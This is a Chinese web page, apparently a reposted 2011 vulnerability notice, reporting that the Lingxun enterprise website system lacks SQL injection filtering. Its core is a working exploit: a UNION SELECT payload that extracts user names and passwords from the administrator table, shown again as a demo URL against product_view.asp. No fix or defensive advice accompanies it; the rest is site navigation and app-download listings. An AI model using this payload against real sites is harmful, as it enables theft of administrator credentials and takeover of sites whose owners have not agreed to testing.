文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>灵讯企业网站系统 SQL注入漏洞

灵讯企业网站系统 SQL注入漏洞

时间:2011-04-19  来源:黑白前线

发布日期:2011-04.19
发布作者:佚名

漏洞类型:SQL注入

漏洞描述:灵讯企业网站系统程序未进行SQL注入过滤导致SQL注射漏洞。


漏洞测试EXP:

union select 1,user_name,password,4,5,6,7,8,9,10 from administrator 

 

Demo:
http://localhost/product_view.asp?id=23 union select 1,user_name,password,4,5,6,7,8,9,10 from administrator
 

 

标签分类:

相关阅读 更多 +
排行榜 更多 +
幣安BNB币行情神器

幣安BNB币行情神器

金融理财 下载
愤怒的火柴人4中文版下载

愤怒的火柴人4中文版下载

角色扮演 下载
嘟嘟脸恶作剧手游下载

嘟嘟脸恶作剧手游下载

休闲益智 下载